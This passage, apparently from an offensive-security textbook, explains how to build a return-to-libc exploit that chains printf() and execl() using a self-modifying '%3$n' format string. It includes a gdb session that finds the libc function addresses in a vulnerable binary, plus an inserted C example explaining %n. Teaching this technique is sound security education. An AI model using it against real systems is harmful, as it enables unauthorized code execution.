At that point, when the original vulnerable function returns, this new saved
eip will be popped off the stack and printf() executed with the arguments starting with
"%3\$n", which will write the number of bytes in the format string up to the format
token (0x0000) into the third direct parameter. Since the third parameter contains the
location of itself, the value 0x0000 will be written into that spot. Next the execl()
function will be called with the arguments from the first "./wrapper" string onward.
Voilà, we have created the desired execl() function on the fly with this self-modifying
buffer attack string.
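To make the two mechanisms the paragraph relies on concrete, here is a small added example (not code from the book) of what %n and the "N$" direct-parameter syntax do in plain C with literal format strings: %n stores the number of bytes produced so far into the int the selected argument points to, so a token placed at the very start stores 0, which is the 0x0000 discussed above.

```c
#include <stdio.h>

/* Added example, not from the book: %n stores the count of bytes
 * produced so far into the int pointed to by the matching argument;
 * it prints nothing itself.  The formats below are literals, so this
 * is ordinary C semantics rather than the vulnerability. */

/* Returns the value %n stores when it follows 'prefix'.
 * An empty prefix puts the token first, so 0 is stored. */
int bytes_before_n(const char *prefix)
{
    char out[64];
    int count = -1;
    snprintf(out, sizeof out, "%s%n", prefix, &count);
    return count;
}

/* Direct parameter access: "%3$n" selects the third argument no
 * matter in which order the others were consumed.  Arguments 2 and
 * 1 are printed in reverse order first, then the byte count of that
 * output lands in the int that argument 3 points to. */
int direct_param_n(const char *a, const char *b)
{
    char out[64];
    int count = -1;
    snprintf(out, sizeof out, "%2$s%1$s%3$n", a, b, &count);
    return count;
}

int main(void)
{
    printf("%d\n", bytes_before_n(""));          /* 0 */
    printf("%d\n", bytes_before_n("AAAA"));      /* 4 */
    printf("%d\n", direct_param_n("ab", "cde")); /* 5 */
    return 0;
}
```

The write primitive only exists when the format string itself comes from untrusted input; passing that data as an argument to a literal format such as "%s" leaves any %n in it inert.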
To build the preceding exploit, we need the following information:
• The address of the printf() function
• The address of the execl() function
• The address of the "%3\$n" string in memory (we will use the environment section)
• The address of the "./wrapper" string in memory (we will use the environment section)
• The address of the location we wish to overwrite with a NULL value
Starting at the top, let's get the addresses.
BT book $ gdb -q vuln2
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80483aa
(gdb) r
Starting program: /mnt/sda1/book/book/vuln2
Breakpoint 1, 0x080483aa in main ()
(gdb) p printf
$1 = {<text variable, no debug info>} 0xb7ee6580 <printf>
(gdb) p execl
$2 = {<text variable, no debug info>} 0xb7f2f870 <execl>
(gdb) q
The program is running.